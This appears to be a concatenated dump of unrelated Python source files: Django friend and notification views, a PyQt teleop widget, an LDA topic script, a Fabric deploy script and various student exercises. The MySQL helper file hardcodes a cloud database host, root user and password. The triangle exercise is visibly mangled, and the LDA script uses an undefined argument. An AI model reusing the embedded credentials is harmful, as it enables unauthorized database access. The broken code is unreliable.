painter.translate(QPoint(_width/2, _height/2))\n #eje\n painter.drawLine(QPointF(-_width, 0), QPointF(_width, 0))\n painter.drawLine(QPointF(0, -_height), QPointF(0, _height))\n\n #con el raton\n pen = QPen(Qt.red, width)\n painter.setPen(pen)\n\n #Comprobamos que el raton este dentro de los limites\n if abs(self.line.x()*2) >= self.size().width():\n if self.line.x() >= 0:\n self.line.setX(self.size().width()/2)\n elif self.line.x() < 0:\n self.line.setX((-self.size().width()/2)+1)\n\n if abs(self.line.y()*2) >= self.size().height():\n if self.line.y() >= 0:\n self.line.setY(self.size().height()/2)\n elif self.line.y() < 0:\n self.line.setY((-self.size().height()/2)+1)\n\n painter.drawLine(QPointF(self.line.x(), -_height),\n QPointF(self.line.x(), _height))\n\n painter.drawLine(QPointF(-_width, self.line.y()),\n QPointF(_width, self.line.y()))\n\n #print \"x: %f y: %f\" % (self.line.x(), self.line.y())\n\n v_normalized = (1.0/(self.size().height()/2)) * self.line.y()\n v_normalized = float(\"{0:.2f}\".format(v_normalized))\n w_normalized = (1.0/(self.size().width()/2)) * self.line.x()\n w_normalized = float(\"{0:.2f}\".format(w_normalized))\n\n #print \"v: %f w: %f\" % (v_normalized,w_normalized)\n self.parent_function(w_normalized, v_normalized)\n painter.drawImage(self.line.x()-self.qimage.width()/2,\n self.line.y()-self.qimage.height()/2, self.qimage)\n","sub_path":"rqt_drone_teleop/src/rqt_vel_teleop/teleopWidget.py","file_name":"teleopWidget.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"390763476","text":"# This file was copied from a tutorial with O'reaily books tutorial\r\n# and has completly been used for practice and experimentation\r\n# code was written by Jessica McKellar\r\n\r\nWORD_LIST = \"sowpods.txt\"\r\nwordlist = open(WORD_LIST).readlines()\r\n# Get rid of newlines\r\nwordlist = [word.lower().strip() for word in wordlist]\r\n\r\nscores = {\"a\": 1, \"c\": 3, \"b\": 3, \"e\": 1, \"d\": 2, \"g\": 2,\r\n \"f\": 4, \"i\": 1, \"h\": 4, \"k\": 5, \"j\": 8, \"m\": 3,\r\n \"l\": 1, \"o\": 1, \"n\": 1, \"q\": 10, \"p\": 3, \"s\": 1,\r\n \"r\": 1, \"u\": 1, \"t\": 1, \"w\": 4, \"v\": 4, \"y\": 4,\r\n \"x\": 8, \"z\": 10}\r\n","sub_path":"Python/scrabble.py","file_name":"scrabble.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"602440324","text":"import os\nfrom django.shortcuts import render, get_object_or_404, Http404, redirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required \nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom django.db.models import F,Q\nfrom django.utils.timezone import now\nfrom django.contrib.auth.forms import PasswordChangeForm \nfrom django.contrib.auth import authenticate, login, get_user_model, logout \n#COSTUM IMPORTS \nfrom Forum.forms import EditProfileForm\nfrom .models import Friend, UserProfile,FriendRequest\nfrom .forms import loginForm, registerForm, UserProfileForm\nfrom blog.models import Post,Notifications\n\ndef create_notify(sender,post,action_type,reciever):\n print('create_notify')\n # try :\n print('friend found')\n notif = Notifications.add_nofi(sender,post,action_type,reciever)\n print('reciver added')\n print(action_type)\n print('done')\n # except :\n # print('Notification not created') \n # print(action_type)\ndef notify_context(user,context):\n print('notify_context')\n #querying Notifications\n try :\n print(user)\n print('check 0')\n noti = Notifications.objects.filter(receivers=user)\n noti_no_qs = noti.filter(read_at=None)\n print(noti_no_qs.count())\n context['Notifications'] = noti\n context[\"notification_no\"] = noti_no_qs.count()\n context[\"user\"] = user\n print('check 1')\n print(\"check 2\")\n except :\n print('except :')\n print('noti not found')\ndef friend_requests_context(user,context):\n print('friend_requests_context')\n #querying FriendRequest\n try :\n print(user)\n print('check 0')\n friend_request = FriendRequest.objects.filter(Q(receiver=user)&Q(delete=False))\n print('check 0')\n context['friend_request'] = friend_request\n req_no = friend_request.count()\n context[\"req_no\"] = req_no\n print(req_no)\n print('check 0') \n except :\n print('except :')\n print('req not found') \ndef people(request):\n # quering user\n try :\n user = UserProfile.objects.get(user=request.user)\n except UserProfile.DoesNotExist :\n raise Http404(\"UserProfile.DoesNotExist\")\n except :\n return redirect('home')\n try :\n people = UserProfile.objects.all()\n except UserProfile.DoesNotExist :\n raise Http404(\"UserProfile.DoesNotExist\")\n except :\n raise Http404(\"except :\")\n context = {\n \"people\":people,\n }\n # querying notifications\n notify_context(user,context)\n friend_requests_context(user,context)\n return render(request, \"people_page.html\",context)\ndef follow(request, operation, pk):\n current_user = UserProfile.objects.get(user=request.user)\n to_be_followed = UserProfile.objects.get(pk=pk)\n if operation=='follow':\n Friend.follow(current_user,to_be_followed )\n print(\"follow list updated\")\n if operation=='unfollow':\n Friend.un_follow(current_user, to_be_followed)\n return redirect(\"accounts:users_profile\",pk=pk)\ndef friend_request(request,pk):\n current_user = UserProfile.objects.get(user=request.user)\n new_friend = UserProfile.objects.get(pk=pk)\n try :\n friend_request_qs,created = FriendRequest.objects.get_or_create(\n sender=current_user,\n receiver=new_friend,\n requested=True,\n delete = False,\n read_at = None,\n accepted= False\n )\n print(' friend_request sent')\n except :\n print('exception :(')\n return redirect(\"accounts:users_profile\",pk=pk)\ndef accept_request(request,pk):\n print(\"accept\")\n current_user = UserProfile.objects.get(user=request.user)\n new_friend = UserProfile.objects.get(pk=pk)\n try :\n friend_request_qs,created = FriendRequest.objects.get_or_create(sender=new_friend,receiver=current_user,requested=True)\n friend_request_qs.accepted = True\n friend_request_qs.delete = True\n friend_request_qs.save()\n print(\"accept check 1\")\n try :\n qs=FriendRequest.objects.get(Q(sender=new_friend)&Q(receiver=current_user))\n print(\"accept check 2\")\n bool = True\n except FriendRequest.DoesNotExist :\n bool = null\n except :\n print(\"exception\")\n bool = null\n print(\"accept check 3\")\n print(bool)\n if (bool == True) and (qs.accepted == True) :\n print(\"accept check 4\")\n Friend.add_friend(current_user, new_friend)\n qs.read_at = now()\n qs.save()\n qs.delete()\n print('qs.delete()')\n qs.save()\n print(qs.read_at)\n print(\"Friend list updated\")\n except :\n print('exception :(')\n return redirect(\"accounts:users_profile\",pk=pk)\ndef ignore_request(request,pk):\n print('ignore :')\n current_user = UserProfile.objects.get(user=request.user)\n new_friend = UserProfile.objects.get(pk=pk)\n # try :\n friend_request_qs,created = FriendRequest.objects.get_or_create(sender=current_user,receiver=new_friend,requested=True)\n print('check 1')\n friend_request_qs.read_at = now()\n print('check 2')\n print(\"Friend list updated\")\n friend_request_qs.accepted = False\n print('check 3')\n friend_request_qs.delete = True\n print('check 4')\n friend_request_qs.save()\n print('check 5')\n friend_request_qs.delete()\n print('check 6')\n friend_request_qs.save()\n print('check 7')\n # try :\n # qs=FriendRequest.objects.get(Q(sender=current_user)&Q(receiver=new_friend))\n # bool = True\n # except FriendRequest.DoesNotExist :\n # bool = False\n # except :\n # print(\"exception\")\n # if (bool == True):\n # qs.read_at = now()\n # print(\"Friend list updated\")\n # except :\n # print('exception :(')\n print('end of ignore')\n return redirect(\"accounts:users_profile\",pk=pk)\ndef remove_friend(request,pk):\n current_user = UserProfile.objects.get(user=request.user)\n new_friend = UserProfile.objects.get(pk=pk)\n Friend.remove_friend(current_user, new_friend)\n return redirect(\"accounts:users_profile\",pk=pk)\ndef Friend_request_view(request):\n try :\n active_user = UserProfile.objects.get(user=request.user)\n except :\n return redirect('home')\n context = {\n 'initilze' : 'initilze'\n }\n \n # try :\n notify_context(active_user,context)\n friend_requests_context(active_user,context)\n # except :\n # raise Http404(\"Notifications page eror\")\n return render(request,'friend_requests.html',context)\n\ndef profile_page(request):\n if request.user :\n print(\"checked\")\n context = {\n \"title\" : \"Profile\",\n \"description\" : \"Welcome to the Profile page\",\n }\n try :\n user = UserProfile.objects.get(user=request.user)\n avatar =user.avatar.url\n context[\"avatar\"] = avatar\n context['username'] = user.__str__\n context['user'] = user\n context['edit'] = 'edit'\n except :\n return redirect('home')\n print(\"checked\")\n # if user.is_authenticated :\n if user:\n try:\n new_qs = Friend.objects.get(current_user=user)\n friend_list = new_qs.friend_list.all()\n context[\"friend_list\"] = friend_list\n except Friend.DoesNotExist :\n print(\"Friend.DoesNotExist\")\n except :\n print(\"Friend.DoesNotExist\")\n try:\n posts = Post.objects.all().filter(auther=user).order_by('-time')\n context[\"posts\"] = posts\n except Post.DoesNotExist :\n print(\"Posts.DoesNotExist\")\n #querying notifications\n notify_context(user,context)\n friend_requests_context(user,context)\n return render(request, \"Profile.html\", context)\n\ndef users_profile_page(request, pk):\n context = {\n \"title\" : \"Profile\",\n \"description\" : \"Welcome to the Profile page\",\n \"pk\" : pk\n }\n active_user = UserProfile.objects.get(user=request.user)\n try :\n user = UserProfile.objects.get(pk=pk)\n print(user)\n avatar =user.avatar.url\n print(\"found the pic\")\n context[\"avatar\"] = avatar\n context['username'] = user.__str__\n context['user'] = user\n except :\n raise Http404(\"user not found\")\n if user==UserProfile.objects.get(user=request.user):\n return redirect(\"accounts:profile\")\n else :\n\n try :\n new_qs = Friend.objects.get(current_user=user)\n friend_list = new_qs.friend_list.all()\n context[\"friend_list\"] = friend_list\n except Friend.DoesNotExist :\n new_qs = None\n print('Friend.DoesNotExist')\n if new_qs is not None : \n try :\n # friendship_state_query = Friend.friend_list.through.objects.get(userprofile=user)\n # friendship_state_query = new_qs.friend_list.through.objects.get(userprofile=active_user)\n friendship_state_query = Friend.objects.get(Q(current_user=active_user)&Q(friend_list=user))\n print('friendship_state_query found')\n friendship_state = \"remove\"\n context['remove'] = friendship_state\n except Friend.DoesNotExist :\n friendship_state = \"add\"\n context['add'] = friendship_state\n except :\n friendship_state = \"add\"\n context['add'] = friendship_state\n try :\n following_state_query = Friend.objects.get(Q(current_user=active_user)&Q(following=user))\n # following_state_query = new_qs.following.through.objects.get(userprofile=active_user)\n print('following_state_query found')\n follow_state = \"unfollow\"\n context['unfollow'] = follow_state\n except Friend.DoesNotExist :\n follow_state = \"follow\"\n context['follow'] = follow_state\n except :\n follow_state = \"follow\"\n context['follow'] = follow_state\n else:\n follow_state = \"follow\"\n context['follow'] = follow_state\n friendship_state = \"add\"\n context['add'] = friendship_state\n try :\n posts = Post.objects.all().filter(auther=user).order_by('-time')\n context[\"posts\"] = posts\n except Post.DoesNotExist :\n print('Post.DoesNotExist')\n notify_context(active_user,context)\n friend_requests_context(active_user,context)\n return render(request, \"Profile.html\", context)\n\ndef search_page(request):\n context = {\n \"title\" : \"Serach Page\",\n \"description\" : \"Welcome to the Search page\"\n }\n return render(request, \"home_page.html\", context)\n\ndef login_page(request):\n form = loginForm(request.POST or None)\n if form.is_valid():\n print(form.cleaned_data)\n username = form.cleaned_data.get(\"username\")\n password = form.cleaned_data.get(\"password\")\n user = authenticate(request ,username=username,password=password)\n if user is not None:\n login(request, user)\n return redirect(\"/\")\n else :\n print(\"error\")\n context = {\n \"form\" : form ,\n # \"url\" : request.url \n \n }\n return render(request, \"auth/login_page.html\",context)\ndef logout_page(request):\n logout(request)\n return redirect(reverse('accounts:login'))\nUser = get_user_model()\n\ndef register_page(request):\n # form = registerForm(request.POST or None)\n form = UserProfileForm(request.POST or None, request.FILES or None)\n context = {\n \"form\" : form\n }\n if form.is_valid():\n print('check')\n instance = form.save(commit=False)\n print(form.cleaned_data)\n username = form.cleaned_data.get(\"username\")\n password = form.cleaned_data.get(\"password\")\n email = form.cleaned_data.get(\"email\")\n new_user = User.objects.create_user(username, email, password)\n instance.user = new_user\n instance.save()\n print(new_user)\n return redirect(\"/\")\n else :\n form = UserProfileForm()\n return render(request, \"auth/register_page.html\", context)\n@login_required(login_url=\"/login\")\ndef edit_profile(request):\n user=UserProfile.objects.get(user=request.user)\n context = {\n 'init' : 'init'\n }\n if request.method == 'POST' :\n form = EditProfileForm(request.POST,instance=user.user)\n if form.is_valid() :\n form.save()\n return redirect('accounts:profile')\n else :\n form = EditProfileForm(instance=user.user)\n context['form'] = form\n return render(request,'EditProfilePage.html',context)\n@login_required(login_url=\"/login\")\ndef change_password(request):\n user=UserProfile.objects.get(user=request.user)\n context = {\n 'init' : 'init'\n }\n if request.method == 'POST' :\n form = PasswordChangeForm(request.POST,user=user.user)\n if form.is_valid() :\n form.save()\n return redirect('accounts:profile')\n else :\n form = PasswordChangeForm(user= user.user)\n context['form'] = form\n return render(request,'change_password.html',context)\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"183423421","text":"import pymysql.cursors\nimport json\nclass OperationMysql:\n def __init__(self):\n self.conn = pymysql.connect(\n host=\"rm-2ze67p557wd9p0m70.mysql.rds.aliyuncs.com\",\n port=3306,\n user='root',\n password='arNV3CN7gTwMGt5nMm',\n database='dev_1911edu',\n charset = 'utf8',\n cursorclass = pymysql.cursors.DictCursor\n )\n self.cur = self.conn.cursor()\n def search_one(self):\n sql=\"SELECT id FROM `user` WHERE user_name = 13681319134\"\n self.cur.execute(sql)\n result = self.cur.fetchone()\n result = json.dumps(result)\n ret = json.loads(result)\n return ret['id']\n\nif __name__ == '__main__':\n ret = OperationMysql().search_one()\n print(ret)\n","sub_path":"util/connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"3840839","text":"def main():\r\n import sys\r\n num = int(sys.stdin.readline())\r\n num1=int(sys.stdin.readline())\r\n num2=int(sys.stdin.readline())\r\n if (num num2 and num + num2 > num1 and num1 + num2 > num\r\n if num > num1 and num > num2 :\r\n print(\"Escaleno,\",\"Lado mas largo es\",num)\r\n elif num1 > num and num1 > num2:\r\n print(\"Escaleno,\",\"Lado mas largo es\",num1)\r\n else:\r\n print(\"Escaleno,\",\"Lado mas largo es\",num2)\r\n if triangulo == \"imposible\":\r\n triangulo!=\"Equilatero\"!=\"Isosceles\"!=\"Escaleno\"\r\n print (\"Triangulo Imposible\")\r\nmain()\r\n \r\n \r\n","sub_path":"AYED/Programas/a5.py","file_name":"a5.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"381249169","text":"from pydantic import UUID4, BaseModel, EmailStr\n\n\nclass RegistrationUserEventModel(BaseModel):\n \"\"\"Модель данных события регистрации пользователя.\"\"\"\n\n user_id: UUID4\n firstname: str\n email: EmailStr\n\n class Config:\n schema_extra = {\n \"example\": {\n \"user_id\": \"2831e77b-463d-4678-b261-cb52684db28a\",\n \"firstname\": \"Bob\",\n \"email\": \"Bob@yandex.ru\",\n }\n }\n","sub_path":"eventsAPI/models/registration_user_event.py","file_name":"registration_user_event.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"386932165","text":"from datetime import datetime\nfrom django.db import models\n\n\nclass Weather:\n\n class Meta:\n fields = ['city', 'temperature', 'description', 'icon']\n\n def __init__(self):\n self.city: str\n self.description: str\n self.icon: str\n self.icon: float\n\n\n","sub_path":"WeatherApp/weather/WeatherApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"337828828","text":"### LDA Topic Modeling - Sklearn Implementation\nimport os, io\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport json, csv\nimport tempfile\nfrom collections import OrderedDict\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation\nfrom sklearn.feature_extraction import text\n\ncsv_lda_topics = {}\njson_lda_topics = []\ncorpus = []\na = []\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-f\", \"--file\", type=str, default=\"-\", help=\"did not specify file\")\nargs = parser.parse_args()\n\nif args.file != \"-\":\n raw = io.open(args.file, 'r',encoding='utf-8')\n txt = raw.read().lower()\n path = os.path.dirname(args.file) + \"/\"\n tweets = pd.read_csv(args.file)\n print(\"Number of tweets:\",len(tweets['Tweet']))\n\nfor i in range(len(tweets['Tweet'])):\n a=tweets['Tweet'][i]\n corpus.append(a)\nTEMP_FOLDER = tempfile.gettempdir()\nprint('Folder \"{}\" will be used to save temporary dictionary and corpus.'.format(TEMP_FOLDER))\n\nno_features = 500\nmy_additional_stop_words = []\nstop_words = text.ENGLISH_STOP_WORDS.union(my_additional_stop_words)\n\n# NMF - tf-idf\ntfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2, max_features=no_features, stop_words=stop_words)\ntfidf = tfidf_vectorizer.fit_transform(corpus)\ntfidf_feature_names = tfidf_vectorizer.get_feature_names()\n\ntf_vectorizer = CountVectorizer(max_df=0.95, min_df=2, max_features=no_features, stop_words=stop_words)\ntf = tf_vectorizer.fit_transform(corpus)\ntf_feature_names = tf_vectorizer.get_feature_names()\n\nno_topics = 20\n\n# Run NMF\nnmf = NMF(n_components=no_topics, random_state=1, alpha=.1, l1_ratio=.5, init='nndsvd').fit(tfidf)\n\n# Run LDA\nlda = LatentDirichletAllocation(n_components=no_topics, max_iter=5, learning_method='online', learning_offset=50.,random_state=0).fit(tf)\n\ndef display_topics(model, feature_names, no_top_words):\n for topic_idx, topic in enumerate(model.components_):\n top_words = []\n for i in topic.argsort()[:-no_top_words - 1:-1]:\n top_words.append(feature_names[i])\n print(\"Topic %d:\" % (topic_idx))\n print(\" \".join([feature_names[i]\n for i in topic.argsort()[:-no_top_words - 1:-1]]))\n json_lda_topics.append( {\"topic\": topic_idx, \"top_words\": top_words} )\n csv_lda_topics[topic_idx] = top_words\n\nno_top_words = 10\n#display_topics(nmf, tfidf_feature_names, no_top_words)\ndisplay_topics(lda, tf_feature_names, no_top_words)\n\nkeys = sorted(csv_lda_topics.keys())\nwith open(args.output + \"/topics(sklearn).csv\", \"w\") as outfile:\n writer = csv.writer(outfile)\n writer.writerow(keys)\n writer.writerows(zip(*[csv_lda_topics[key] for key in keys]))\n\nwith open(args.output + \"/topics(sklearn).json\", 'w') as fp:\n json.dump(json_lda_topics, fp)\n","sub_path":"topics-LDA.py","file_name":"topics-LDA.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"80942621","text":"'''\nFor the sake of validation, we use a seperate class, where we can record our\ntrials, after which we claim various statistics.\n'''\n\nimport numpy as np\nfrom collections import Counter\n\ndef tester(num_label):\n '''Factory method'''\n return Tests(num_label)\n\n\ndef identity(o):\n return o\n\n\nclass Tests(object):\n '''\n '''\n def __init__(self, num_label):\n self.num_label = num_label\n self.true = []\n self.predicted = []\n\n\n def record(self, true, predicted):\n # sanity check\n assert(len(true) == len(predicted))\n\n # the recorded values will be used later\n self.true.extend(true)\n self.predicted.extend(predicted)\n\n\n def recordMeta(self, meta):\n self.meta = meta\n\n\n def goThroughWith(self, func):\n size = len(self.true)\n collected = []\n\n for i in range(size):\n item = func(self.true[i], self.predicted[i], self.meta[i])\n if item:\n collected.append(item)\n\n return collected\n\n\n def getMissClassifiedScreenNamesInAge(self, age_range):\n assert(len(age_range) == 2) # sanity check\n\n def pickUpScreenName(true, predict, meta):\n age = meta['age']\n if true != predict and age_range[0] <= age <= age_range[1]:\n return meta['screen_name']\n\n return self.goThroughWith(pickUpScreenName)\n\n\n def collectMissClassificationByAge(self):\n ''' Returns a counter that contains the occurrence of missclassification\n for each age. '''\n size = len(self.true)\n collect_ages = []\n\n for i in range(size):\n if self.true[i] != self.predicted[i]:\n age = self.meta[i]['age']\n collect_ages.append(age)\n\n cnt = Counter(collect_ages)\n return cnt\n\n\n def collectTrueLabelsByAge(self):\n size = len(self.true)\n collect_ages = []\n\n for i in range(size):\n age = self.meta[i]['age']\n collect_ages.append(age)\n\n cnt = Counter(collect_ages)\n return cnt\n\n\n def confusionMatrix(self, inverse = identity):\n ''' If the labels in true and predicted lists are in non-numerical ones,\n one should provide a way to revert the label to the index used in the\n confusion matrix '''\n dim = self.num_label # dimension\n conf = np.zeros((dim, dim), dtype=int) # confusion matrix\n\n for i in range(len(self.true)):\n t = inverse(self.true[i])\n p = inverse(self.predicted[i])\n conf[t, p] += 1\n\n return conf\n\n\n def accuracy(self):\n size = len(self.true)\n correct = 0\n\n for i in range(size):\n if self.true[i] == self.predicted[i]:\n correct += 1\n\n return float(correct) / float(size)\n\n\n\n","sub_path":"code_backup/py/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"188166475","text":"import spline\nimport numpy as np\n\nmspl = spline.SPLINT\n\nclass REC_SPL:\n\n def __init__(self, rho, dat, sigmas, erbar, x_out):\n\n self.rec_spline(rho, dat, sigmas, erbar, x_out)\n\n def rec_spline(self, rho, dat, sigmas, erbar, x_out):\n\n finished = False\n spl = mspl(rho, dat, erbar, x_out, 1)\n yspl2 = spl.y_fit\n self.ind_not = []\n while not finished:\n yp_ref = np.interp(rho, x_out, yspl2)\n y_diff = np.abs(dat - yp_ref)\n jr = np.argmax(y_diff)\n toler = sigmas*erbar*np.max(np.abs(yp_ref))\n if y_diff[jr] > toler:\n self.ind_not.append(jr)\n rho = np.delete(rho, jr)\n dat = np.delete(dat, jr)\n spl = mspl(rho, dat, erbar, x_out, 1)\n yspl2 = spl.y_fit\n else:\n finished = True\n self.yrec = yspl2\n self.rho = rho\n self.dat = dat\n","sub_path":"rec_spline.py","file_name":"rec_spline.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"426234666","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 25 20:16:06 2019\n\n@author: hiparco\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nG = 1\n\nJEANS05 = -4\nJEANS11 = -2\n\nCONDITION = JEANS05;\n#CONDITION = JEANS11;\n\nkkj = 0.5\nL = 1\nXmin = -L/2\nXmax = Xmin+L\nV = 1\nVmin = -V\nVmax = Vmin + 2*V\nT = L/V\nk = 2 * (2*np.pi/L)\n\nrho = 1.0/(T**2 *G)\n\nsigma = np.sqrt(4*G*np.pi*rho*kkj**2/k**2)\n\nprint(2*sigma**2)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"init_con.py","file_name":"init_con.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"485232332","text":"#tkinter is a module that holds all the function\n#that let us easily make GUI elements\nimport tkinter as tk\n\n\n#creating the main window\n#To do this we need to call the TK() function\nroot = tk.Tk()\nlabel = tk.Label(root, text = \"Welcome to Concentration\")\nlabel.grid(row = 0, column = 0, columnspan = 2)\n\nbtn1 = tk.Button(root,text =\"1\")\nbtn1.config(width = 5, height = 5)\nbtn1.grid(row = 1, column = 0, sticky = \"NESW\")\n\nbtn2 = tk.Button(root,text =\"2\")\nbtn2.config(width = 5, height = 5)\nbtn2.grid(row = 1, column = 1, sticky = \"NESW\")\n\n\nbtn3 = tk.Button(root,text =\"3\")\nbtn3.grid(row = 2, column = 0, sticky = \"NESW\")\nbtn3.config(width = 5, height = 5)\n\n\nbtn4 = tk.Button(root,text =\"4\")\nbtn4.grid(row = 2, column = 1, sticky = \"NESW\")\nbtn4.config(width = 5, height = 5)\n\n\n#This line displays the root and sets the program\n#in a infinit loop. This is an EVENT DRIVEN PROGRAM\n\nroot.mainloop()\n#All of this code above generates the window and the comments below \n#imprt tkinter as tk\n#root = tk.Tk()\n#root.mainloop() \n","sub_path":"GUIgridDemo.py","file_name":"GUIgridDemo.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"290689420","text":"# modules\nimport unittest\nimport json\nfrom unittest.mock import patch\n\n# handler\nfrom main import handler, make_url\n\n# data\nEVENT = {\n 'queryStringParameters': {\n 'ingredients': 'avocado,sugar'\n },\n 'path': '/test',\n 'method': 'GET'\n}\n\nCONTEXT = {}\n\nclass TestHandler(unittest.TestCase):\n def setUp (self):\n '''\n Setup test case\n '''\n self.evt = EVENT\n self.cxt = CONTEXT\n\n def test_make_url (self):\n '''\n Test making the url\n '''\n path = '/test'\n params = {\n 'ingredients': 'avocado,sugar',\n 'query': 'value'\n }\n url = make_url(path, params)\n\n self.assertEqual(url, 'https://api.spoonacular.com/test?ingredients=avocado,sugar&query=value&apiKey=DUMMY_KEY')\n\n # None params\n params = None\n url = make_url(path, params)\n\n self.assertEqual(url, 'https://api.spoonacular.com/test?apiKey=DUMMY_KEY')\n\n # Empty params\n params = {}\n url = make_url(path, params)\n\n self.assertEqual(url, 'https://api.spoonacular.com/test?apiKey=DUMMY_KEY')\n\n @patch('main.requests.request')\n def test_handler (self, mock):\n '''\n Test the request handler\n '''\n mock.return_value.status_code = 200\n mock.return_value.json.return_value = {}\n\n res = handler(self.evt, self.cxt)\n\n self.assertEqual(res['statusCode'], 200)\n self.assertEqual(res['body'], json.dumps({}))\n\n @patch('main.requests.request')\n def test_err (self, mock):\n '''\n Test request error handling\n '''\n mock.stats_code = 500\n mock.return_value.json.return_value = {}\n\n res = handler({}, self.cxt)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"30733497","text":"#!/usr/bin/python3\n# Creates and distributes an archive to web servers\n\nfrom fabric.api import *\nfrom os import path\nfrom datetime import datetime\n\n# do_pack = __import__('1-pack_web_static').do_pack\n# do_deploy = __import__('2-do_deploy_web_static').do_deploy\n\nenv.hosts = ['34.73.136.156', '35.196.227.92']\nenv.user = 'ubuntu'\n\nn = datetime.now()\n\n\ndef do_pack():\n \"\"\"Packs web_static files into .tgz file\"\"\"\n file_name = 'versions/web_static_{}{}{}{}{}{}.tgz'\\\n .format(n.year, n.month, n.day, n.hour, n.minute, n.second)\n local('mkdir -p versions')\n command = local(\"tar -cvzf \" + file_name + \" ./web_static/\")\n if command.succeeded:\n return file_name\n return None\n\n\ndef do_deploy(archive_path):\n \"\"\"Deploys archive\"\"\"\n if not path.exists(archive_path):\n return False\n ret_value = True\n a = put(archive_path, '/tmp/')\n if a.failed:\n ret_value = False\n arch = archive_path.replace(\".tgz\", \"\").replace(\"versions/\", \"\")\n b = run('mkdir -p /data/web_static/releases/' + arch + '/')\n if b.failed:\n ret_value = False\n c = run('tar -xzf /tmp/' + arch + '.tgz' +\n ' -C /data/web_static/releases/' + arch + '/')\n if c.failed:\n ret_value = False\n d = run('rm /tmp/' + arch + '.tgz')\n if d.failed:\n ret_value = False\n e = run('mv /data/web_static/releases/' + arch +\n '/web_static/* /data/web_static/releases/' + arch + '/')\n if e.failed:\n ret_value = False\n f = run('rm -rf /data/web_static/releases/' + arch + '/web_static')\n if f.failed:\n ret_value = False\n g = run('rm -rf /data/web_static/current')\n if g.failed:\n ret_value = False\n h = run('ln -sf /data/web_static/releases/' + arch +\n '/' + ' /data/web_static/current')\n if h.failed:\n ret_value = False\n if ret_value:\n print(\"All tasks succeeded!\")\n return ret_value\n\n\ndef deploy():\n \"\"\"Distribute to all servers\"\"\"\n arch_path = do_pack()\n if arch_path is None:\n return False\n return do_deploy(arch_path)\n","sub_path":"3-deploy_web_static.py","file_name":"3-deploy_web_static.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198360010","text":"import Class_Car\ndef main():\n myCar = Class_Car.Car(\"BMW\",2012,26000,15,\"Imzoughene\")\n #myCar.SetType(\"BMW\")\n #myCar.SetModel(2012)\n #myCar.SetPrice(26000)\n #myCar.SetMilesDrive(15)\n #myCar.SetOwner(\"Imzoughene\")\n currentPrice=myCar.GetPriceByMiles()\n print(\"{}'s Car : New Price : {}\".format(myCar.GetOwner(),currentPrice))\n\n HamidCar = Class_Car.Car(\"GMC\",2006,28000,7,\"hamid\")\n #HamidCar.SetType(\"GMC\")\n #HamidCar.SetModel(2006)\n #HamidCar.SetPrice(28000)\n #HamidCar.SetMilesDrive(7)\n #HamidCar.SetOwner(\"hamid\")\n currentPrice = HamidCar.GetPriceByMiles()\n print(\"{}'s Car : New Price : {}\".format(HamidCar.GetOwner(),currentPrice))\n\nif __name__ == '__main__':main()","sub_path":"CarMain.py","file_name":"CarMain.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"333179145","text":"\"\"\"\n This spider is a JobCenter24h spider created on top of the ATSSpider\n scrapy crawl jobcenter24h -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://mul.jobcenter24h.de/cgi-bin/public.pl?frontend=Public::Stellenangebote&application=StellenangeboteBewerber\"\n\n sample seed urls:\n https://ikh.jobcenter24h.de/cgi-bin/public.pl?frontend=Public::Stellenangebote&application=StellenangeboteBewerber\n https://franz.jobcenter24h.de//cgi-bin/public.pl?frontend=Public::Stellenangebote&application=StellenangeboteBewerber\n\n sample job url:\n https://mul.jobcenter24h.de/cgi-bin/public.pl?frontend=StellenangebotDetails&application=StellenangeboteBewerber&command=showDetails&SessionId_stellenangebote=936710&SessionStellenboerse=mul\n\"\"\"\n\nfrom re 